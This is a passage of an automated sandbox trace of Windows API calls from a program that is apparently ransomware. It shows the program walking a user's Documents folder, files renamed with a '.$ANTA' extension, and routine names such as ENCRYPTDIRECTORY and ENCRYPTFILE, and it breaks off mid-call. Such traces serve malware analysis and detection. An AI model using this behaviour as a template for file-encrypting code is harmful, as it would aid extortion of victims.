lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.135] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.135] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3c05dd, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfe3c05dd, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfe432e87, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="Favorites.vssx.$ANTA", cAlternateFileName="FAVORI~1.$AN")) returned 1 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0084.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0084.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0084.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0084.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.182] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 1 [0084.182] TranslateMessage (lpMsg=0x144f004) returned 0 [0084.182] DispatchMessageW (lpMsg=0x144f004) returned 0x0 [0084.182] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0084.182] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0084.182] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0084.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0084.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0084.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.182] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0084.183] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.183] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0084.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.183] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="_private", cAlternateFileName="")) returned 1 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.184] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0084.184] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.184] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.185] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.185] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0084.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0084.185] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e25d0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0xb, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3570, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﲘмńဓ+\x10")) returned 0 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0084.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.186] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0084.186] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0084.186] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0084.186] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|_private", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.187] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0084.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0084.188] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0084.188] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0084.189] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0084.189] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private")) returned 0x12 [0084.310] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caa00, cFileName=".", cAlternateFileName="")) returned 0x41ac500 [0084.311] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caa00, cFileName="..", cAlternateFileName="")) returned 1 [0084.311] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x43caa00, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0084.311] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e26f0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3574, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﯸмńဓ+\x10")) returned 0 [0084.311] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0084.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|folder.ico", cchCount1=11, lpString2="", cchCount2=0) returned 3 [0084.311] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0084.311] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="folder.ico", cAlternateFileName="")) returned 0x41ac500 [0084.311] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0084.312] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: 